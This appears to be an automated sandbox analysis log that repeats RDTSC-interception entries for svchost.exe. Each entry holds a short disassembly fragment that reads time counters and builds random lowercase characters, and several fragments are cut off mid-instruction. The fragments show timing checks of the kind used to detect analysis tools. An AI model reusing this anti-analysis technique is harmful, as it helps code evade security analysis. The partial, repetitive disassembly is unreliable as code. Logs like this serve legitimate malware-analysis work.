Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59844h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA59313h 0x00000031 call 2AA4FD36h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59490h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59844h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59653h 0x00000033 call 2AA4F8F6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59490h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA596B5h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4F9F6h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA59350h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59684h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA59313h 0x00000031 call 2AA4F9F6h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59690h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59484h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59453h 0x00000033 call 2AA4FF96h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59350h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA59875h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4F9F6h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA594F0h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59844h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59453h 0x00000033 call 2AA4F7F6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59850h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59844h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA59813h 0x00000031 call 2AA4FB36h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59350h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59484h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA598B3h 0x00000033 call 2AA4F7F6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59510h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59844h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA59653h 0x00000031 call 2AA4FB36h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA594F0h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59244h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA598B3h 0x00000033 call 2AA4FD36h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA594F0h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA591C4h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA59513h 0x00000031 call 2AA4F8F6h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59490h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59344h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA598B3h 0x00000033 call 2AA4FEF6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59690h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA59875h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4FB36h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA59490h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59844h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA59213h 0x00000031 call 2AA4FB36h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA594F0h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59484h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59653h 0x00000033 call 2AA4F9F6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59250h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59144h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA59653h 0x00000031 call 2AA4F8F6h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59690h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59484h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA594B3h 0x00000033 call 2AA4FD36h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59130h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59684h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA598B3h 0x00000031 call 2AA4F7D6h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59850h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59244h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA598B3h 0x00000033 call 2AA4FBD6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59250h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59844h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA59813h 0x00000031 call 2AA4FB36h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59690h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59344h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59653h 0x00000033 call 2AA4F9F6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59690h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59344h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA59193h 0x00000031 call 2AA4FEF6h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59850h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
